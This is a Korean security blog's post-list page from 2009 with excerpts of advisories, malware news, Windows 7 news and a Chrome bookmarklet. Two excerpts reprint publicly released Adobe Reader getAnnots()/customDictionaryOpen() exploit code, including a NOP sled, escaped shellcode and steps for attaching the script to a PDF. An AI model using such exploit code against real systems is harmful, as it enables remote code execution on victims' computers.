Microsoft 보안업데이트(2009년5월13일) S Office PowerPoint에서 해킹에 악용 가능한 취약점에 대한 5월 MS 정기보안업데이트가 발표되었으니, 조속히 패치하시기 바랍니다. [MS09-017] MS Office PowerPoint 취약점으로 인한 원격코드실행 문제 □ 영향 o 공격자가 영향 받는 시스템에 대해 완전한 권한 획득 □ 설명 o MS Office PowerPoint에서 조작된 개체가 포함된 PowerPoint 파일을 처리할 때 발생하는 문제점으로 인한 원격코드 실행 취약점 발생 o 공격자는 조작된 PowerPoint 파일을 사용자에게 전송하여 이를 열어보도록 유도함. 공격이 성공하면 공격자는 프로그램 설치, 삭제, 계정 생성 등 영향 받는 시스템에 대해 완전한 권한 획득 가능 o 관련취약점 : - Legacy File F.. 2009. 5. 13. 하우리보안칼럼 “악성코드, 내 손으로 제거해보자” (주)하우리 기술연구소 바이러스팀 연구원 이새별님 께서 작성 하셨다. 원본링크 : http://hauri.co.kr/customer/security/colum_view.html?intSeq=89&page=1 읽어보니 악성코드 수동삭제에 대해서 잘 설명해 주셨지만, 초보자들이 하기에는 조금 무리인듯 하다;; 2009. 5. 12. Microsoft: Windows 7 release in August '09 마이크로 소프트가 윈도우7버전을 8월달에 발표한다고 한다. Microsoft has officially dropped the façade on Windows 7 in 2010 and conceded that its essentially completed operating system will ship this year. Windows 7 will be released to manufacturing in about three months, pending feedback on the current release candidate, senior vice president of the Windows and Windows Live engineering group Steven Sinofsky said Monday... 2009. 5. 12. 네이트온 변종 발생 최근 네이트온 쪽지로 전파되는 악성코드의 변종이 발생하고 있다. 파일이 실행되면, 4명의 여자의 사진을 보여주며 악성파일을 설치한다. 2009. 5. 11. [AdobeReader]Adobe Reader 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit GetAnnots() 취약점과 같이 발표 된 customDictionaryOpen()의 POC //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux //############## var memory; function New_Script() { var nop = unescape("%u9090%u9090"); var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b %u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%.. 2009. 4. 30. [AdobeReader]Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit 몇일 전 취약점이 공개되었던 AdobeReader에 대한 POC가 공개되었다. 이제 또 한차례 폭풍이 불어오나? ㅋ //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux // //Steps: //- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted) //- attach the following script to the OpenAction of the pdf. //############## var memory; function New_Scri.. 2009. 4. 30. [AdobeReader]Adobe Reader (getAnnots() 등)취약점으로 인한 피해 주의 □ 개요 o Adobe Reader에서 getAnnots() / customDictionaryOpen() 처리 시 발생하는 메모리 손상 에러로 원격코드 실행이 가능한 신규 취약점이 발표되어 사용자의 주의를 요함[1, 2, 3, 4] o Adobe Reader 사용자는 메일/메신저로 전송된 출처가 불분명한 PDF 파일을 열람하지 않도록 주의하여야 함 □ 영향 받는 시스템 o Adobe Reader / Acrobat 9.1 이하 버전 o Adobe Reader / Acroba 8.1.4 이하 버전 o Adobe Reader / Acroba 7.1.1 이하 버전 ※ 모든 플랫폼(윈도우, 매킨토시, Unix/Linux) 상의 모든 제품 버전에 해당함 □ 설명 o 악의적으로 작성된 PDF 문서를 열어볼 경우 피해.. 2009. 4. 29. [Google Chrome] 구글 크롬 마우스 우측버튼 해제하기!! 크롬을 사용하지 않으려고 했으나 ㅋㅋ 역시 속도면에서 IE6을 능가하기 때문에 ㅠㅠ 어쩔수 없이 크롬님을 숭배하기로 했다 ㅋ 그러나 이런 젝일~ 마우스우측버튼이 안되네? 그래서 열심히 인터넷을 찾던 중 방법을 알게 되었다. 우선 이 파일을 다운로드하여 설치한다 1. 구글 크롬의 북마크의 추가 페이지 생성 2. 생성된 북마크의 URL 란에 다음의 스크립트를 복사 해서 넣는다. javascript:function r(d){d.oncontextmenu=null;d.onselectstart=null;d.ondragstart=null;d.onkeydown=null;d.onmousedown=null; d.body.oncontextmenu=null;d.body.onselectstart=null;d.body.ondra.. 2009. 4. 29. 이전 1 ··· 213 214 215 216 217 218 219 ··· 223 다음
